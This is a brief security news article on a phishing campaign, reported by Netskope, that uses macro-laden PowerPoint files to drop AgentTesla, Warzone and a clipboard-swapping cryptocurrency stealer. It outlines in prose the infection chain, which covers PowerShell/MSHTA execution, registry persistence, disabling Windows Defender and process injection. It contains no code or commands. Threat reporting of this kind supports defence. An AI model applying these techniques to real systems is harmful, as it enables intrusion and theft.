Since December 2021, fraudulent PowerPoint presentations have been used in phishing efforts to deliver several types of malware, notably remote access and information-stealing trojans. According to Netskope’s Threat Labs research, attackers are using PowerPoint files in conjunction with reputable cloud services to host malware payloads. Warzone (aka AveMaria) and AgentTesla are two formidable RATs and info-stealers that target various applications. The researchers also noted the dropping of bitcoin stealers in the monitored campaign.
The malicious PowerPoint phishing file includes an obfuscated macro run using PowerShell and MSHTA, both built-in Windows capabilities. After that, the VBS script is de-obfuscated and new Windows registry entries are added for persistence, resulting in the execution of two scripts. The first retrieves AgentTesla from an external URL, while the second turns off Windows Defender.
The VBS also creates a scheduled job, which runs a script every hour that pulls a PowerShell cryptocurrency stealer from a Blogger URL. AgentTesla is a RAT (remote access trojan) built on.NET that can collect browser passwords, track keystrokes, and capture clipboard contents, among other things. It’s run via PowerShell and is slightly obfuscated, with a function that injects the payload into a running instance of “aspnet_compiler.exe.”
Warzone, a RAT, is the second payload delivered in this campaign. However, Netskope doesn’t provide much information about it in the report. The cryptocurrency stealer is the campaign’s third payload, which compares clipboard data to cryptocurrency wallet patterns using a regex. If discovered, it substitutes the recipient’s address with one controlled by the actor. The stealer supports Bitcoin, Ethereum, XMR, DOGE, and other cryptocurrencies. On this GitHub page, Netskope has disclosed the whole list of IoCs (indicators of compromise) for this campaign, including all wallets used by the actors.